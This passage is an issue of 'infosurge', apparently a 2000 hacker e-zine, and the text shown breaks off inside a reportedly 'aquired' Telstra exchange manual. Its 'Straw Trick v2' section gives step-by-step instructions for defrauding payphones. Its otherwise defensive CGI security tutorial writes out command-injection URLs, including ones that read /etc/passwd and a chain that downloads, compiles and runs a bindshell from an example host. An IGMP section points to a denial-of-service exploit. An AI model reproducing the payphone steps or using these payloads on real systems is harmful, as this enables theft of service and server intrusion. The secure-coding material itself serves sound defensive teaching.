Copy Link
Add to Bookmark
Report
infosurge Issue 06
.__________
________ |_ ___ |
(________)__ ______. |___|_____
| | ! | |__ |
| info | __ | | __ |
| surge | | | ___| | |
| | | | | |
l________j____j |____j_________l
|____j
_____._____ ____ __ ___________ __ _________.
| | | | ! | ! | __ |
| __|__ | | ______| __ | ______|
l__ | ! | | | | | | |
| | | | | | | |
l________j_______l____j_|_______ |_________j
| j |
l____________j asKi by k.
.------------- ----------------.
: Official Web Site -> http://infosurge.rendrag.net :
: Official Submissions -> phase5@cmdrkeen.net :
: Official Author of the Month -> Dr. Seuss :
: :
: issue #6: 26/07/2000 :
.__________________________________________________________.
"decreasing the global cluefactor by 0.69%"
............................[ Table Of Contents ]...........................
[Intro ............................................................... phase5]
[Editorial ........................................................... phase5]
[Basic Steganography ................................................ ^jestar]
[Nokia SimClocks .................................................. assasss|n]
[IGMP Flaw in Windows ................................................. lymco]
[Straw Trick v2 ....................................................... gruf|]
[CGI Security .......................................................... fyre]
[ICM v2 Docs .................................................... MarlinSpike]
[A look into wiretapping ............................................. psyops]
[Ericsson GH337 ...................................................... Pottsy]
[Outro .............................................................. phase5]
[Total ................................................... infosurge (79.2kb)]
.................................[ shouts ].................................
[ shard ^jestar lymco eckz damien bsdave fyre heihachi xm k beatz stormie ]
[ assass|n synister cmdrkeen phunki ghengis head_rush tux x-circuit make\\ ]
[ alpha karag aphex Wewted cyberpuppet fed0 ]
........[ Editorial ].................................[ phase5 ]............
Back again with issue 6. for some reason, I received some complaints about
issue 5. 'lack of content' was the most common complaint. strangely, those
complaining about the < 3kb size were the same who had contributed 0kb. I'd
just like to thank them all for their support. It was their tireless work that
made is5 what it was. On a related note, we desperately need articles, but
thats nothing new.
</bitching>
While I'm here, I would like to thank those who have supported us, especially
Damien for providing hosting and #phreak and #infosurge.
........[ Basic Steganography ].......................[ ^jestar ]............
> Intro
Steganography is the art of hiding information in such a way so that it
is unnoticable to the naked eye (or ear, or any manner of senses depending
on what container you use). The basic concept of this is as follows. Imagine
you are James Bond (you know you want to) and you need to get a message
back to M from the field without being detected (because being killed would
be kind of detrimental to your living status), now I guess you are thinking
to yourself "easy, i'll encrypt my message and send it in via email" (this
being the age of the internet and all) but shock horror your email is intercepted
by the evil super villian of the day, and this being the movies your message
was decyrpted in 10 seconds using a flashy computer system and you were
found and *retired*. As you can see, encrypting messages you want to keep
secret is only as effective as the encryption method and strength you use.
Now lets go through that scenario using steganography instead of normal
encryption methods. You work out your message and using steganography
techniques you embed your message into a jpg image of you (bond, james bond)
on holiday in Hawaii with your mother. You then email this back to M. The
email is intercepted (pesky evil super villains) but all they see is holiday
snaps of you and your mother, think nothing of it and send it on through.
Your message gets through to M, who has been told in advance that any
messages that you send would come through in that photo, and uses techniques to
remove to stego payload from the image, leaving the message to get through
unhindered.
Now thats a kinda odd description but it seems to point out pretty well
what some of the benefits of steganography are. The power of it is that
people cant read what they don't know is there.
> Common containers
Im not sure if its the actual technical term for the media in which you
want to store the stego payload, but I call it the container. This makes
sense to me because it will be *holding* the payload, and containers hold
stuff (makes sense right?). Anyway, a stego container can be almost anything
you can imagine, from the fairly obvious to the completely abstract. The
following are some fairly obvious containers for a stego payload:
- Text
- Images
- Audio
There are also some containers which are completely abstract, you wouldnt even
suspect that they might contain a hidden message. A quick scan around my
room revealed these as the most abstract containers I could see:
- A deck of cards (order of cards could be a message)
- A cassette tape
I've also heard of some pretty ingenious methods being used for containers
like manipulating the headers of tcp/ip packets, as you can see, I wasnt
joking when I said basically anything could be a container. If you decide
to use something that you think is fairly cool and isnt something people
would think of straight away I would be interested in hearing about it
(jestar@rendrag.net or ^jestar/#phreak@austnet.org). Now onto the juicy
stuff.
> Getting the message across
The technique for hiding the message will obviously different depending
on the container that you decide to use, and I will cover a few of the
simpler methods in this article (it is a *basic* stego article after all)
the theory covered for the basics will most likely be easily applied to
what ever container you end up using.
>> text
There are a number of ways that you can embed a message in text but
the easiest way is probably through character substitution. Im not sure
if thats the right word (again) but what I mean is this. You would take
a normal sentence and hide the message in it, or more likely you would
build a convincing sentence (or story) around your message. Here's a
simple example:
Ok, the message is 'i am sam, sam i am'
and here is the stego carrier, a paragraph of plain text
'In Adelaide mall Sunday after morning, Sally ate maccas in
Alans monaro'
You can probably see how that one worked, the first letter of each word
is a letter of the payload. Now, that was pretty obvious, and if its
obvious then it ISNT effective stego. In fact, I reckon my cat could spot
that payload. Also, the container paragraph sounds kinda stilted, you can
tell theres something not quite right with it because you had no choice
in what letter the word would start with. I would suggest using something
like the first letter of a sentence is a letter of the payload, which would
make for a much more free flowing container, but on the downside a much
longer container. You can use pretty much any character manipulations you
want, as long as the person on the receiving end knows exactly what you
are using, after all, if you make it really good they are gonna have to
know how to get the payload out.
>> images
Storing the stego payload in images is far more interesting, and if you get
into steganography this is what you will probably mostly be using. The idea
is to work out what the least significant bits in the image file are (ie, the
ones that *wont* affect the actual output of the image, or will only affect it
slightly) You then replace these bits with the bits of your message. Of course,
the amount of payload you can fit will differ depending on what picture you use,
what colour depth the image is, what format the image is stored in and a number
of other factors. You also need some way of recording which bits you have
modified so that you can later remove the payload. The end result of good image
steganography is an identical image with and without the payload. The end result
of bad image steganography can range from discoloured images to strange warping
of the image, to any number of other odd effects (noise, blur etc).
> Would you like extra paranoia with that order?
If you are really stressed out about the message being intercepted (and lets face
it, if your using steganography then you are) then you will probably want the extra
layer of defence that encrypting the payload would give, and theres no reason you
shouldnt encrypt the payload before putting it into the container but remember that
an encrypted message ends up being much larger than a non encrypted message
(generally anyway) so you will either need a bigger container, or to split up the
message into multiple containers (which may be required for larger payloads
anyway). All something to think about.
> Closing
I hope you have found this very basic introduction to steganography interesting,
and perhaps it will motivate you to find out more. There are many stego tools
available at www.securityfocus.com if you are interested in giving some of them a
try, for a variety of containers.
jestar
........[ Nokia SimClocks ]..........................[ assass|n ]............
I would like to clear up a bit of confusion out there in the phreaking
community in regards to the stopping of the sim-card (Sim Clock) on a nokia
5110 : NSE-1. The *#746025625# (*#sim0clock#) is a feature which is supposed
to be a power saving feature which saves power by removing the charge from the
sim-clock. When *#746025625# is entered into most nokia mobile phone it
displays "Sim Clock Stop Allowed" or "Sim Clock Stop Not Allowed", but if you
view the proper nokia technical documentation about Field Test Display it
states some interesting information. Section 3.5: Memory Handling - 3.5.1
Display 51: SIM information --> shows the display for the test function 51
which is as follows;
++++++++++++++ Example display: ++++++++++++++
+aaa bbb ccc + MY Phone +3 372 YES +
+ dddddddd + +DOWN(UP) +
+ f g hh ii + + 3 X 10 XX +
+ j kkkk + + 0 0000 +
++++++++++++++ ++++++++++++++
aaa Sim voltage selection type (5, 3 or 3/5)
bbb Sim baudrate (372, 64, 32 or 0)
ccc Clock stop allowed, Yes or No
dddd Clock stop condition, Up or down (PREFFERED)
eee Clock stopped, Yes or No (NOT IMPLEMENTED)
f pin1 attempts left (0,1,2,3)
g pin2 attempts left (0,1,2,3)
hh puk1 attempts left (0-10)
ii puk2 attempts left (0-10)
j ATR retransmission counter (0-9)
kkkk Transmission frame/parity errors, FE/PE + hexadecimal count
That clearly states that the option of stopping the sim clock was not
implemented, but it does show the Sim Clock stop allowed feature, which on my
phone is enabled. Therefore I have come to the conclusion that the ability to
stop a Sim Clock is non-existant as the feature isn't on the display, meaning
that you can find out the an ability which cannot actually be carried out. So
for all those people out there who tell me that they can get free calls by
stopping the sim clock, simply explain how you are doing such a thing, cause
I kinda aint buyin it :). If you would like more information about what you
have read or about the Nokia Field Test Display contact me through
assassin@datasurge.net
........[ IGMP Flaw in Windows ].......................[ lymco ]............
This is a quick article to explain the glitch in the TCP/IP stack for
Windows 9*, and NT 4.0. It may be approaching old school, however few
people actually know about the problem, yet alone understand it..
. what's the problem?
Sending fragmented IGMP packets to a Windows box can cause the operating
system to lose performance and/or crash. IGMP (Internet Group Management
Protocol) is a protocol in the TCP/IP suite, and is used for IP multicasting,
where data sent to a single IP can reach multiple hosts.
. prevention
Microsoft have released patches at the following addresses:
Windows95:
http://www.microsoft.com/windows95/downloads/contents/WUCritical/vip386/Default.asp
Windows98:
http://www.microsoft.com/windows98/downloads/contents/WUCritical/VIP386/Default1.asp
Windows NT 4.0:
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP5/IGMP-fix/
. the exploit
A re-write of the original exploit can be found at:
dev.spanner.net/scripts/pimp.c
Use it for securing boxes, not for running amok and DoS'ing random Windows
users. (Disregard previous line, fed0).
. conclusion
This is an example of another Windows TCP/IP vulnerability. Instead of
adding on more garbage to Windows each version, Microsoft should perhaps
redo it from scratch. There is a chance they could get it right, after
all, they are on the right track. Windows actually reminds me of hotdogs, alot
of crap gets thrown together to form it, yet it can still be satisfying.
If you have any comments/questions or hate mail, please direct it to
lymco@spanner.net.
--
lymco
dev.spanner.net
........[ Straw Trick v2 ].............................[ gruf| ]............
Aha, payphones!
Now, we have all heard of the entertaining things that it was possible to do
with a $2 coin, a straw & a telstra payphone. Unfortunately, telstra heard of
this as well, & (un)promptly spent several million fixing their little problem.
And now there's another one.
--------------------
The Principle.
Apart from the fucking obvious one of free fone-calls...
This seems to work only if you use one coin, that is worth more than a local
call. (eg, 50c). If you use, say, a 20c coin the call only lasts for approx
20 seconds, and that is not the aim of the exercise :)
--------------------
Well what is it then?
Basically it goes like this. Get your trusty ald macca's straw out. And
jettison it, get a thinner one. (Something like a normal straw from any servo
or cafe)
- Begin as you would if you were making a call & actually paying for it.
ie, handset up, money in, start to dial.
- Stop dialing, do not finish dialing, (do not let the phone connect).
- Hold the flap covering the coin-return-bay CLOSED.
- Utilising your trusty new straw (im my case conveniently located inside an
old coke can beside the fone), slide the straw into the phone above and in
the middle of the flap you are holding closed.
- When the straw bottoms out (going upwards) violently smack the straw from
side-to-side a few times.
- Clink, goes your refunded coin.
- $$ credit stays in fone.
& your off like old fish.
grufl@yahoo.com
........[ CGI Security ].................................[ fyre ]............
Basic CGI Security
Fyre <fyre@box3n.gumbynet.org>
INTRODUCTION
------------
A few weeks ago, a friend of mine decided to write a web interface to the
FIGlet program (http://st-www.cs.uiuc.edu/~chai/figlet.html for details). His
naive implementation of the interface may have looked similar to the following
PHP code:
-- 8< -- 8< -- 8< -- webfig.php3 -- 8< -- 8< -- 8< --
<html><head><title>webfig</title></head><body><pre>
<?
system ("figlet $text");
?>
</pre></body></html>
-- 8< -- 8< -- 8< -- webfig.php3 -- 8< -- 8< -- 8< --
Throughout this article I've used PHP to illustrate my points since it's easier
on the eyes, simpler to understand and seems to be quite popular recently,
instead of a language like C, perl, python, tcl, pike, etc. Most languages will
have the equivalent of a system() function with the same flaws as PHP's so this
discussion is just as relevant to any language.
If you have a working Apache+PHP3 setup, enter the code for webfig.php3 from
this article and follow the examples, it's much easier to illustrate how
dangerous it is. Take care that the webfig.php3 can't be access by anyone else
and remove it when you've finished with it just in case.
That script works (try it if you dare), the URL
http://localhost/~fyre/webfig.php3?text=hi in a web browser produces this
output:
_ _
| |__ (_)
| '_ \\| |
| | | | |
|_| |_|_|
(figlet 'hi' produces the same output)
PROBLEM
-------
Some people may stop there and sadly a lot of people do. However, the system()
function in PHP, the popen() and exec() functions and the backtick operator (`)
uses the shell to execute the command. Most other languages have equivalent
functions. Although my examples use PHP's system() function, the points I
discuss are relevant to any function in any programming language that uses the
shell to execute commands.
The SYSTEM(3) manpage, which documents the C system() function upon which the
PHP function is based has this to say:
system() executes a command specified in string by calling /bin/sh -c string
and returns after the command has completed.
The entry for system() in the PHP manual says this:
Note, that if you are going to allow data coming from user input to be passed
to this function, then you should be using the EscapeShellCmd() function to
make sure that users cannot trick the system into executing arbitrary commands.
This warning is often overlooked by inexperienced PHP programmers or people who
have to get a job done in a hurry.
The way a user's input can "trick" the system into executing arbitrary commands
is by having embedded shell metacharacters. These characters have a special
meaning to the shell, from separating a list of commands to redirecting the
output of a program somewhere, and must be "quoted" or "escaped" if this
special meaning is not desired.
As I had expected, his script did not escape the shell metacharacters as the
manual suggested. I tried something similar to this URL in my trusty Internet
Explorer*: http://localhost/~fyre/webfig.php3?text=hi;ls - this is the somewhat
scary output:
_ _
| |__ (_)
| '_ \\| |
| | | | |
|_| |_|_|
webfig.php3
very_secret_data
Yeek! The system() call here would have executed /bin/sh -c 'figlet hi;ls'. As
you should have picked up, the ; character separates commands. The script has
been "tricked" into executing both figlet and ls instead of only figlet.
The fun doesn't stop there. Just about every other shell metacharacter can be
used to cause unexpected results and can pose a security risk. A few of the
most useful ones (to the person trying to break in to your site) are:
; (semicolon) - Discussed above. Semicolons separate commands to be
sequentially executed by the shell. Incredibly easy to use to breach security.
(http://localhost/~fyre/webfig.php3?text=hi;ls)
| (vertical bar) - Pipes; output of preceeding program is the input of the
proceeding program. (http://localhost/~fyre/webfig.php3?text=hi|ls)
&&, || (double-ampersand, double-bar) - These tell the shell to execute the
following command (similar to semicolon) depending on the exit status of the
previous command. double-ampersand executes the next command if and only if the
previous command's exit status was 0 (success). double-bar executes the next
command if and only if the previous command's exit status was nonzero
(failure). (http://localhost/~fyre/webfig.php3?text=hi&&ls)
& (ampersand) - Executes the preceeding command in the background and also
separates commands. (http://localhost/~fyre/webfig.php3?text=hi&ls)
< > >> (triangle brackets) - Input and output redirection operators - these can
be used to read the contents of other files or to write to files.
(http://localhost/~fyre/webfig.php3?text=</etc/passwd,
http://localhost/~fyre/webfig.php3?text=>important_data)
`, $() (backticks, dollar-bracket) - Evaluates the shell commands between the
backticks (`command`) or dollar-brackets ($(ls)).
(http://localhost/~fyre/webfig.php3?text=hi`ls`)
newline - Newlines separate commands just like semicolons, although they're a
little bit harder to get into a URL - The urlencoded form is %0A (see the note
below). (http://localhost/~fyre/webfig.php3?text=hi%0Als)
$ (dollar) - Can be used to get the value of an environment variable.
(http://localhost/~fyre/webfig.php3?text=$OSTYPE)
~ (tilde) - A single tilde is replaced with the current user's home directory
(for example, ~ expands to /home/fyre). If the tilde is followed by a username,
that user's home directory is used (for example, ~root expands to /root).
However, if the username following a tilde is not present on the system, it is
left alone (for example, if there is no account 'fred' on this system, ~fred
stays as ~fred). This can be used to determine whether a user has an account on
the system.
*, ? (star, question mark) - Wildcards. These can be used to get a listing of
files in a directory matching a certain pattern. A single * may be used to list
all files in the current directory as usual, or you may prefix it with a
directory name, eg. /etc/*. (http://localhost/~fyre/webfig.php3?text=*)
Another character to watch out for is NUL (%00), which is used by C and the
system as an end-of-string marker. For example,
http://localhost/~fyre/webfig.php3?text=hi%00moo will only output "hi" since
the system thinks the string ends at the NUL character and ignores the rest.
Rain Forest Puppy's article in Phrack 55 has a nice discussion of the effect of
NUL characters in the perl language.
In summary, the W3C recoomends escaping these characters:
&;`'\\"|*?~<>^()[]{}$\\n\\r
Note that not all characters are valid in URL's, and some are processed
specially by the webserver (ampersands, for example) - you must 'urlencode'
these characters by replacing them with a percent sign ('%') followed by the
two digit hexadecimal representation of their ASCII code. For example, %0A is
ASCII 0A hex, 10 decimal, newline. If that sounds too much like hard work, this
little C program may help:
-- 8< -- 8< -- 8< -- urlencode.c -- 8< -- 8< -- 8< --
#include <stdio.h>
int main () {
int c;
while ((c = getchar()) != EOF)
printf ("%%%02x", c);
putchar ('\\n');
return 0;
}
-- 8< -- 8< -- 8< -- urlencode.c -- 8< -- 8< -- 8< --
It urlencodes its standard input and writes it to standard output. You might
use it like this:
$ echo -n 'hi;ls' | urlencode
%68%69%3b%6c%73
... but that's not very relevant, we're writing secure scripts here not taking
advantage of other programmers' mistakes, right? ;>
Listing files is the tip of the iceberg. Have a look at this example (%20 is
the space character):
http://localhost/~fyre/webfig.php3?text=hi;wget%20http://www.example.com/bindshe
ll.c
http://localhost/~fyre/webfig.php3?text=hi;cc%20bindshell.c%20-o%20bindshell
http://localhost/~fyre/webfig.php3?text=hi;./bindshell
There the malicious evil d00d has downloaded a 'bindshell' (a program that
usually listens on a TCP port and drops anyone connecting to that port into a
shell, bypassing the normal login sequence. It does not usually show up in
logs, either), then compiled it with cc, the C compiler, and finally executed
it. They now have the privileges of the user CGI scripts are run as, which will
depend on your configuration. Now that they have access to a shell, there are
far more vulnerabilities they can try to use to gain superuser access.
SOLUTION
--------
Hopefully that has scared you into writing code that avoids all the problems
associated with shell metacharacters. Luckily for you, PHP's escapeshellcmd()
function comes to the rescue! Its purpose is to "escape shell metacharacters",
it prefixes them with a backslash (\\) so the shell does not treat them
specially. For example, the string "hi;ls" would be converted to "hi\\;ls". A
more secure version of webfig.php3:
-- 8< -- 8< -- 8< -- webfig.php3 -- 8< -- 8< -- 8< --
<html><head><title>webfig</title></head><body><pre>
<?
system ("figlet ".escapeshellcmd($text));
?>
</pre></body></html>
-- 8< -- 8< -- 8< -- webfig.php3 -- 8< -- 8< -- 8< --
This time we use escapeshellcmd() to stop malicious people "tricking" the shell
into doing things it shouldn't before using their input. When we try the
earlier example of http://localhost/~fyre/webfig.php3?text=hi;ls we get the
following (better) output:
_ _ _
| |__ (_)_| |___
| '_ \\| (_) / __|
| | | | |_| \\__ \\
|_| |_|_( )_|___/
|/
That is much better, and none of the previously mentioned metacharacters cause
any adverse effects when used in the 'text' parameter.
I'm still a little bit scared of the system() function since it may not
understand every metacharacter your shell does. If you're paranoid, you could
escape _every_ character with a backslash (\\). "hi;ls" becomes "\\h\\i\\;\\l\\s". As
you can see, this makes the string unreadable and doubles the storage required
to hold it.
As you might have realised, there is still at least one more problem with our
improved webfig.php3. Remembering that UNIX interprets command line arguments
beginning with a '-' as an option. We can specify command line options to the
figlet program by embedding them in the 'text' variable! For example,
http://localhost/~fyre/webfig.php3?text=-f%20small%20hi is executed as "figlet
-f small hi", which uses a different font via the -f option. The figlet program
doesn't seem to have any dangerous command line arguments, except perhaps the
-f, -d and -C options which read from files. They seem to be quite picky about
their input, however, and I haven't been able to make them display arbitrary
files.
As a special case, if '--' is encountered then option processing is terminated.
When invoked as "figlet -- -f small hi", the '-f' is not treated as a command
line argument, instead it is treated as normal text. See the GETOPT(3) manpage
for specific details on how options are processed in most (not all) programs.
The following version of webfig.php3 is a little more secure:
-- 8< -- 8< -- 8< -- webfig.php3 -- 8< -- 8< -- 8< --
<html><head><title>webfig</title></head><body><pre>
<?
system ("figlet -- ".escapeshellcmd($text));
?>
</pre></body></html>
-- 8< -- 8< -- 8< -- webfig.php3 -- 8< -- 8< -- 8< --
It is left as an exercise to the reader to find additional security holes in
the above version of webfig.php3 :)
CONCLUSION
----------
I've touched on just one of the many important security problems faced by any
programs running at a privilege level above that of the user causing the
commands to execute. CGI scripts have this problem have this problem since the
user should not be able to cause execution of arbitrary commands on a
webserver. setuid and setgid programs on UNIX systems have this problem (along
with a bunch of other problems) - they run as a privileged user (setuid root
programs pose the most danger, although setgid tty and setgid mail are almost
as bad).
In conclusion, I reccomend you avoid system() and the other similar functions
in whatever language you choose like the plague unless you're absolutely sure
you've done it properly.
That's all from me...
*Internet Explorer: Don't start this flamewar with me. Show me a better browser
and I'll try it.
........[ ICM v2 Docs ]...........................[ MarlinSpike ]............
ICM V2 - EXCHANGE END USERS MANUAL
Here is a manual I recently 'aquired' about the ICM and related
systems in use in our exchanges. This is an exact transcript of the
manual, word for word, line for line. This is the second version of
the system, so I imagine the third version is in use in some
exchanges around Australia, but this system may be in use in your
local exchange. At the very least, it gives you an example of the
kind of equipment used in exchanges and can familiarise you with
this type of equipment. It will also help you learn alot of the
jargon and procedures used by Telstra and it is a piece of whatever
puzzle it is you may be trying to solve. Anyway, if you ever get
access to this system, it wouldn't do for you to not be able to
utilise it, now would it?
CONTENTS
1. INTRODUCTION
1.1 THE CONCEPT OF INDIVIDUAL CIRCUIT MONITORING
1.1.1 General
1.1.2 Circuit Performance Management
1.1.3 Fault Detection
1.1.4 Limitations
1.2 THE ICM SYSTEM HARDWARE STRUCTURE
1.2.1 General
1.2.2 Central Computer System
1.2.3 Exchange-based Equipment
1.3 CENTRAL COMPUTER FUNCTIONS
1.3.1 Establishing Communications
1.3.2 Time Syncronisation
1.3.3 Configurations and Passwords
1.3.4 Remote Usage/Pegcount Polling
1.3.5 Poll Reports
2. PRINTER/TERMINAL
2.1 GENERAL
2.1.1 On Line Indication
2.1.2 Enabling/Disabling Printouts
2.2 CONFIGURING
2.2.1 Configuration Table
2.2.2 References
3. CONTROLLER AND COMMUNICATIONS INTERFACE (CCI)
3.1 GENERAL
3.1.1 Power Up
3.1.2 Diagnostics
3.2 FRONT PANEL
3.2.1 Idle LED Pattern
3.2.2 Modem LEDs
3.2.3 Printer/Terminal Port
3.2.4 GPIB Ports
3.2.5 Push Buttons
3.3 ERROR DIAGNOSTICS
3.3.1 GPIB Monitoring
3.4 LINE TESTING
4. INDIVIDUAL CIRCUIT MONITORING MODULES
4.1 GENERAL
4.2 INSTALLATION
4.2.1 Power Up
4.2.2 Replacement
4.2.3 Precautions
5. SYSTEM OPERATION
5.1 LOCAL FUNCTIONS FROM PRINTER/TERMINAL
5.1.1 General
5.2 IDLE MODE COMMANDS
5.2.1 Listing Configurations
5.2.2 ICMM Status Request
5.2.3 Central Computer Link Status
5.2.4 Central Computer Link Statistics
5.2.5 Dynamic Memory Status
5.2.6 Time Request
5.2.7 Poll Status
5.2.8 Request Group Report
5.2.10 Request Transaction Report
5.2.11 Help
5.3 SPECIAL MODE COMMANDS
5.3.1 Local Poll Mode
5.3.1.1 Polling an ICMM
5.3.1.2 Polling a Group
5.3.1.3 Swapping Registers
5.3.1.4 Exiting Local Poll
5.3.2 Transactions Mode
5.3.2.1 General
5.3.2.2 Content of Transactions
5.3.2.3 Create/Modify a Group
5.3.2.4 Delete a Group
5.3.2.5 Create a Line
5.3.2.6 Modify a Line
5.3.2.7 Delete an Exchange
5.3.2.8 Edit Transactions
5.3.3 Remote Terminal Mode
5.3.4 Message Mode
5.3.4.1 General
5.3.4.2 Editing Messages
5.3.5 ICMM Test Mode
5.3.6 Communications Mode
5.4 EXITING MODES
6. DATABASE MANAGEMENT
6.1 GENERAL POLICY
6.2 NEW INSTALLATIONS
6.3 AMENDING EXISTING DATABASES
6.4 CODING OF DATA FOR ICM
7. ICM REPORTS
7.1 GENERAL
7.2 REPORT TYPES
7.2.1 Detailed
7.2.2 Exception
7.2.3 Group Summary
7.2.4 Crossed Leads
8. HARDWARE MAINTENANCE AND ROUTINE CHECKS
8.1 GENERAL
8.2 PROVEN FAULTY EQUIPMENT
8.2.1 ICMM
8.2.2 CCI
8.2.3 Printer
8.3 ALARMS
8.4 ROUTINE CHECKS
8.4.1 CCI
8.4.2 ICMM
8.4.3 PRINTER
9. FAULT FINDING
9.1 GENERAL
9.2 FAULT TYPES
9.2.1 Always Idle (AI)
9.2.2 Always Busy
9.2.3 High Pegcount, Low Holding
9.2.4 Low Pegcount, High Holding
9.2.5 Low Pegcount, Normal Holding
9.2.6 High Pegcount, Normal Holding
APPENDICES
APPENDIX A: Coding of Input Data
APPENDIX B: Hexadecimal to Decimal Conversions
1. INTRODUCTION
1.1 THE CONCEPT OF INDIVIDUAL CIRCUIT MONITORING
1.1.1 General
The concept of ICM is based in the fact that all lines in a
route should, over a sufficiently large sample exhibit
similar average hold times. Lines which are never seized,
permanently seized, or have hold times significantly
different from the average for the route are presumed
worthy of investigation and may possibly be faulty.
1.1.2 Circuit Performance Measurement
The ICM System monitors Exchange plant by detecting
"events" and "event states".
An "event" is defined as a transition from the inactive or
idle state to an active or busy state and vice-versa.
An "event state" is the idle or busy state. The circuits
to which ICM test leads are connected are referred to as
"lines".
From this event detection the ICM system collects the
following attributes for each line :-
- Pegcount : The number of times a line is seized in a
given period. This is simply the number
of "events".
- Usage : The accumulated time the line spent in
it's event state during the same period.
The ICM system accumulates these attributes over a time
period known as a 'Poll' period. At the completion of a
Poll period the data is collected by the Central computer
and various reports are generated which highlight suspect
lines.
1.1.3 Fault Detection
The ICM system compares this data with minimum and maximum
expectation 'thresholds' and then produces reports on any
circuit behaviour variations in a group/route.
These 'thresholds' are not specified line-by-line but on a
group of lines by the ICM operator.
Typical thresholds are listed below. They can vary from
group to group, day to day, hour to hour. In fact there is
a lot of "fine-tuning" necessary to reduce the number [of]
non-faulty circuits reported on.
LP (Low Pegcount) Less than 1 an hour
HP (High Pegcount) More than 50 an hour
LH (Low Holding) Less than 30 secs a call
HH (High Holding) More than 3550 secs a call
LU (Low Usage) Less than 50 secs an hour
HU (High Usage) More than 3550 secs an hour
AI (Always Idle) Never seized
AB (Always Busy) Permanently seized
A high Pegcount with a low Average Hold-time are likely
symptoms of a line dropping out before the call is
completed. Conversely high Average Hold-time and low
Pegcount may indicate that a circuit is being held for an
undue length of time.
1.1.4 Limitations
The system only identifies "probable faults" and it is
possible for lines to be deemed faulty when in fact they
are not.
For example, very high usage figures approaching 3600
seconds in a one hour period may indicate a call that is
not releasing properly. It may also indicate a valid call
of an unusual duration.
Similarly, very low or 0 usage figures in a period may
indicate a cct that is not being seized or a period of
little or no traffic. [cct = circuit?]
1.2 THE ICM SYSTEM HARDWARE STRUCTURE
1.2.1 General
The ICM System hardware consists of equipment at both the
Central site and a number of Exchanges.
1.2.2 The Central site consists of the following items :-
- WICAT 200 computer on which the main ICM system
software runs under a WMCS operating system.
- A hard disc (84mb).
- A 9 track Winchester magnetic tape unit.
- 2 VDUs for system control and data maintenance.
- A hi-speed printer.
- Front End Processors through which the computer
communicates with the exchanges via modems.
1.2.3 Exchange-based Equipment
The Exchange equipment consists of the following :-
- Individual Circuit Monitoring Modules (ICMM).
An ICMM can monitor 256 lines. The Exchange ICM can
be expanded in increments of 256.
- ICM Terminal unit frame. A frame can hold up to 14
ICMMs. There is one frame per ICMM rack.
- Controller and Communications Interface (CCI).
The CCI collects the data from the ICMMs and transmits
it to the Central computer over leased modem links.
- The CCI also provides an interface for the ICM
printer/terminal. Some control functions can be
performed by local Exchange staff. The CCI front
panel and the printer/terminal provide limited status
and diagnostics.
1.3 CENTRAL COMPUTER FUNCTIONS
1.3.1 Establishing Communications
The link between the CCI and the Central site is under the
control of an error correcting protocol. Whenever the CCI
is powered-up it attempts to talk with the Central computer.
When 'end-to-end comms' have been established, the CCI
prints out a message:-
COMMS ON LINE
When the CCI cannot communicate with the Central Computer,
a message is printed:-
COMMS LINE BREAK
If there has been a shut-down and re-boot of the Central
site then the message is:-
CENTRAL SITE POWER UP
1.3.2 Time Synchronisation
The CCI contains a battery operated clock which is set by
the Central computer when the CCI powers-up and at each
Poll request.
1.3.3 Configurations and Passwords
When a CCI powers up a command is sent to the Central
computer asking for the Configuration and Group Definitions
to be downloaded. These are then stored in the CCI memory.
New configurations are automatically sent whenever the
database is updated. The CCI will print out a message to
this effect. Local staff can list them with the L command.
The CCI requires Group Definitions/Configurations so that
it knows the ICMM and inlet for each line in each group.
This information is used for both local and remote polling.
1.3.4 Remote Usage/Pegcount Polling
The CCI and Central computer remote polling works unseen to
local staff except for the reports sent to CCI and
printer. For interested local staff a brief description
will be given.
Remote polling begins with the creation of a POLL/REPORT
SCHEDULE by the Central Computer operator. This schedule
contains the groups of lines to be polled, the poll times
and the reports required. When polling starts a command is
sent to the CCI telling it which lines to poll next. The
CCI maps these groups of lines to GPIB/ICMM addresses using
the Group Definitions stored in memory.
When a Poll command is recieved from the Central computer
the CCI sends commands to relevant ICMMs to swap their idle
and active registers. After the swap the Central computer
can ask the CCI for the pegcount and usage data. The CCI
asks each ICMM for this data and transmits it to the
Central site. The Central computer tells the CCI which
groups of lines to poll next and the time to poll them.
1.3.5 Poll Reports
Depending on the Poll/Report Schedule reports are sent to
the exchange concerned. These reports are printed if the
CCI is in the Idle mode. If, however, the CCI has been
placed into another operating mode a message will be
printed out and the user has 30 seconds to exit out of the
mode. Should the user decide not to exit the CCI will
over-ride and print the report before returning to the
user-selected mode.
2. PRINTER/TERMINAL
2.1 GENERAL
The CCI prints Local and Central Computer reports and messages on
the printer/terminal and interprets and executes commands entered
from the key-board.
The printer/terminal is a Digital LA-100 type, and may be located
remotely from the ICM rack provided the length of the cable does
not exceed 20 metres.
The printer/terminal will be installed and configured by the ICM
Installation group.
Should the LA-100 develop a fault it may require re-configuring
for ICM format. Ref 2.2.
2.1.1 On Line Indication
If the printer is correctly configured and the CCI
recognises it then the following lamps glow :-
CTS, LINE, DSR and POWER
2.1.2 Enabling/Disabling Printouts
A printout can be suspended with the keys :-
CTRL+S
This command sends a 'XOFF' to the CCI which is recognised
as a command to suspend printing.
The 'BLOCKED' lamps on the CCI will glow.
The CCI can be instructed to restart printing with the keys:
CTRL+Q
A 'XON' character is sent to the CCI and printing
recommences.
The 'ON LINE' on the CCI will glow.
Never leave the printer unattended in the BLOCKED
condition. The only time the CTRL+S and CTRL+Q keys should
be used is if the printer runs out of paper or the paper
jams.
2.2 CONFIGURING
2.2.1 Configuration Table
To check the current configuration of the LA-100
- Press LOCAL key.
- Press CTRL+SETUP keys together.
- Press STATUS key.
The current configuration table will be printed and must be
as listed below for ICM operation.
LA100 V1.3 KSR
0.4K Buffer
DPSs: 006. ...............
***Keyboard Settings :
E-Local echo:Disabled
K-Keyboard:United States
L-Return Key:<CR>
Q-Keyclick:Disabled
U-Break Key:enabled
Y-Keypad mode:numeric
***Printer Settings :
B-Pitch Mode:All pitches
C-G0 Character set:United States
D-G1 Character set:United States
G2 Character set:United States
G3 Character set:United States
F-Form Length:264
H-Horizontal pitch (cpi):10
J-End of line control:wrap mode
V-Vertical pitch (lpi):6
W-NewLine request char:none
***Communications Settings :
A-Auto-answerback:Disabled
N-Disconnect on EOT:Disabled
O-Paper fault on processing:XOFF (if enabled)
P-Parity:7/E
R-Reciever error:Print block error
S-Speed:1200
X-Auto XON/XOFF:Enabled
Z-Modem control:No Modem Control-Restraint
Any departure from these settings must be corrected.
Refer:- LETTER WRITER 100 GUIDE Chapter 3.
After storing any new configurations exit SETUP and return the
